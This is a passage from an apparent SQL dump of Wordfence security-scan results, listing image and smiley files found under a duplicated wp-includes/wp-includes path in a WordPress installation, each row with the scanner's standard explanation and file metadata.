tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/crystal/document.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77417,1675048827,1675048827,'new','knownfile',75,'63532a26d5918e4a10b5c0e31e1d16a8','aa52acca9dfde1c1b24bd1b5e7fc6669','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/interactive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/crystal/interactive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77418,1675048827,1675048827,'new','knownfile',75,'30be4624775aa5fcf2d2e4baaaee7603','98cf4e44f091ac48435ca836f9e2d08c','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77419,1675048828,1675048828,'new','knownfile',75,'13d18ea1ec18e482a9857caf12528d90','3c221cb15bb39134a9d5877fdbb46770','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/spreadsheet.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/crystal/spreadsheet.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77420,1675048828,1675048828,'new','knownfile',75,'b86b4af973a19231b401339cce5b7619','1f31a3d78b862014ee472e7abc08dc14','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/text.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/crystal/text.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77421,1675048828,1675048828,'new','knownfile',75,'a8c2ffe6e8e85783f5db41540bd7368e','01fcc960ee73763297d09d4f6002c89d','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/crystal/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77422,1675048828,1675048828,'new','knownfile',75,'85587d61d71f5feffa27219a6c98e4fa','8c3a05ad361c4a150e71346548a72ee7','Unknown file in WordPress core: wp-includes/wp-includes/images/down_arrow-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/down_arrow-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77423,1675048828,1675048828,'new','knownfile',75,'7f1087ff09a2a948669b9d87470b6d74','3315b08f593710fa09320cb41386ad30','Unknown file in WordPress core: wp-includes/wp-includes/images/down_arrow.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/down_arrow.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77424,1675048828,1675048828,'new','knownfile',75,'d04c3752c9e680a120f862a8dac09aa7','ce64dfd0d668d16503931d46a2f7306b','Unknown file in WordPress core: wp-includes/wp-includes/images/icon-pointer-flag-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/icon-pointer-flag-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77425,1675048828,1675048828,'new','knownfile',75,'705d01be6c08052a6af003d32f674321','a10192482290d1eb2ee2dedc8434c0a2','Unknown file in WordPress core: wp-includes/wp-includes/images/icon-pointer-flag.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/icon-pointer-flag.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77426,1675048828,1675048828,'new','knownfile',75,'9a0c99a85af977503c819f19adf709d0','4c0117bb251606c8e4f8d1d4980503a9','Unknown file in WordPress core: wp-includes/wp-includes/images/media/archive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/media/archive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77427,1675048828,1675048828,'new','knownfile',75,'635a9b54f3cd6daaf2d0aebde578362d','361e7338dfc1b0d75996cb78f8e8fc87','Unknown file in WordPress core: wp-includes/wp-includes/images/media/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/media/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77428,1675048828,1675048828,'new','knownfile',75,'b1bd8313257a076cee2398d3a0718171','ee4256b87b85fe0f1664b7a953c97982','Unknown file in WordPress core: wp-includes/wp-includes/images/media/code.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/media/code.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77429,1675048828,1675048828,'new','knownfile',75,'8b2cfd91a55fa69a53e06a61d9a30157','ac47425d045753b432f91792368e1e61','Unknown file in WordPress core: wp-includes/wp-includes/images/media/default.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/media/default.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77430,1675048828,1675048828,'new','knownfile',75,'2310501c686351d29455e89a2d13f207','674520148ba5639be10acbed92fb2483','Unknown file in WordPress core: wp-includes/wp-includes/images/media/document.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/images/media/document.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77431,1675048828,1675048828,'new','knownfile',75,'eae3488532bb74c52c40933fe5a457b8','56776aad8e63861f3f544b3227b4f8a1','Unknown file in WordPress core: wp-includes/wp-includes/images/media/interactive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/media/interactive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77432,1675048828,1675048828,'new','knownfile',75,'1632314f3bff55e31a623fe449c4e82c','b1d68e4fbefc2b5d6f3b1a7334169f09','Unknown file in WordPress core: wp-includes/wp-includes/images/media/spreadsheet.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/media/spreadsheet.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77433,1675048828,1675048828,'new','knownfile',75,'70f902682a9b0bcf133fb4f54182f6b8','6afe7764d4795e5a1acbf74bdeb67726','Unknown file in WordPress core: wp-includes/wp-includes/images/media/text.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/media/text.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77434,1675048828,1675048828,'new','knownfile',75,'6f5c43372c266c8c6007027a1dc0e4fc','afbb2a6e912cb9fef48a50cfa347625a','Unknown file in WordPress core: wp-includes/wp-includes/images/media/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/media/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77435,1675048828,1675048828,'new','knownfile',75,'6531a30f81336b45d13a08c29cab06f0','e35708736def021f11239257bd015e9d','Unknown file in WordPress core: wp-includes/wp-includes/images/rss-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/rss-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77436,1675048828,1675048828,'new','knownfile',75,'7eb9c94d7823740a2ffc879ca4ba8987','27caf51464222d98203807a533b5d24d','Unknown file in WordPress core: wp-includes/wp-includes/images/rss.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/images/rss.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77437,1675048828,1675048828,'new','knownfile',75,'7447661fa0d827223a9d8366b2b0ee09','13e16a460355010574fc3fbb8f0e7b3a','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/frownie.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/smilies/frownie.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77438,1675048829,1675048829,'new','knownfile',75,'709eac71ca2a542d613ebd360a75d3f6','789c7380f78db9f89a95be9fc7b73d26','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_arrow.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/smilies/icon_arrow.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77439,1675048829,1675048829,'new','knownfile',75,'2d6032a218ef3812c153b86a99c7ddde','a0fa2e00b7b002e685afd5b8c7f1df4a','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_biggrin.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_biggrin.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77440,1675048829,1675048829,'new','knownfile',75,'e3449acb9e1f0d1686992dbff342a803','1bcbed50c8a598fb1dc3160b0e55d077','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_confused.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_confused.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77441,1675048829,1675048829,'new','knownfile',75,'adfabbe2648a0133c5cb2c0eb1a6e520','842f22bb8a3b8054cafaa498663aa253','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_cool.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_cool.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77442,1675048829,1675048829,'new','knownfile',75,'a8628938ae77481c062268144e9243f5','70032ca3dcebe1bdcc93bca354b68812','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_cry.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_cry.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77443,1675048829,1675048829,'new','knownfile',75,'a277ba3b112ecd4fdc07ca0322ca425f','8c83be9c3eee076a98e751909f6bdef6','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_eek.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_eek.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77444,1675048829,1675048829,'new','knownfile',75,'0ab3012409f843b523fcc7d2c82fb0b2','bb6a5b89b855c6655ed1528039d79687','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_evil.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_evil.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77445,1675048829,1675048829,'new','knownfile',75,'7a42490a29678a03b67bb322fa9cf2b2','e617d647225180e6fe3b61e6809c1245','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_exclaim.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_exclaim.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77446,1675048829,1675048829,'new','knownfile',75,'f1ae79b2a2bcd3fd59f99fcee5a98a83','24b04c1580c9e7a9c4cdfda744eddf73','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_idea.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_idea.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77447,1675048829,1675048829,'new','knownfile',75,'1a3767d4985c4dbb77411a3380f74a6a','b5ae4c64b5c52d736b9b9d1822aadc42','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_lol.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_lol.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77448,1675048829,1675048829,'new','knownfile',75,'09ad9906f8325fb2dfd1996232a323d1','e77780ba73ec0c9f84a759efac0e1193','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_mad.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_mad.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77449,1675048829,1675048829,'new','knownfile',75,'2bd89291d24b1ac4df813a6d8891241e','c158941a5d7b0257d923bbcbd0724897','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_mrgreen.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_mrgreen.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77450,1675048829,1675048829,'new','knownfile',75,'0e4a931bdb5744f2056b40fb95ad7036','821d234d578601f266f39eb8179fafd4','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_neutral.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_neutral.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77451,1675048829,1675048829,'new','knownfile',75,'bf6588d8a02a73b738bc9a74838ae1a7','53825fbecd4f3e830ec3069017478123','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_question.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_question.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77452,1675048829,1675048829,'new','knownfile',75,'87eee4fdaf975d08ac33b5b23d67a339','75e1c7e0bb249ef749f43f09482e1aee','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_razz.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_razz.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77453,1675048829,1675048829,'new','knownfile',75,'2d8bea8a6305b1612c501a08760a16e7','4d04dccf56220e84d3a62f7f971255eb','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_redface.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_redface.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77454,1675048829,1675048829,'new','knownfile',75,'331753072b516ba1111df40a6f355b9c','05f0750108326573212d8ed661051225','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_rolleyes.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or 